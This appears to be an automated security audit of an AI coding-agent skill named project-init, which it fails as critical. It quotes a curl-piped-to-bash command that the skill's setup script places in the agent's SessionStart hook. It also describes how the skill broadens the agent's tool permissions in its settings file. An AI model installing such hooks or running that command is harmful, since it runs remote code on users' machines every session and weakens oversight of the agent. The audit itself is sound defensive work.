project-init
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: CRITICALREMOTE_CODE_EXECUTIONEXTERNAL_DOWNLOADSCOMMAND_EXECUTION
Full Analysis
- [REMOTE_CODE_EXECUTION] (CRITICAL): The script
scripts/setup-project.shdefines a configuration hook that executes code from a remote URL by piping it directly into bash. - Evidence: The
NEW_HOOKvariable inscripts/setup-project.shcontains the commandcurl -fsSL https://raw.githubusercontent.com/ArjenSchwarz/agentic-coding/main/scripts/claude-remote.sh | bash. - [EXTERNAL_DOWNLOADS] (HIGH): The skill downloads a script from an untrusted GitHub repository (
ArjenSchwarz/agentic-coding) which is not on the approved trusted sources list. - [COMMAND_EXECUTION] (HIGH): The skill grants broad, unverified execution permissions for a wide range of sensitive system tools (including
docker,terraform,make, and various language compilers) by modifying the.claude/settings.jsonfile. - [PERSISTENCE MECHANISMS] (HIGH): By injecting the malicious command into the
SessionStarthook of the Claude configuration, the skill ensures that the remote code is executed automatically every time the agent starts a new session in that directory. - [INDIRECT PROMPT INJECTION] (MEDIUM): The skill modifies local configuration files (
.claude/settings.json) which dictates the security boundaries and behavior of the agent in subsequent interactions, allowing an attacker-controlled script to define the agent's capabilities.
Recommendations
- CRITICAL: Downloads and executes remote code from untrusted source(s): https://raw.githubusercontent.com/ArjenSchwarz/agentic-coding/main/scripts/claude-remote.sh - DO NOT USE
- AI detected serious security threats
Audit Metadata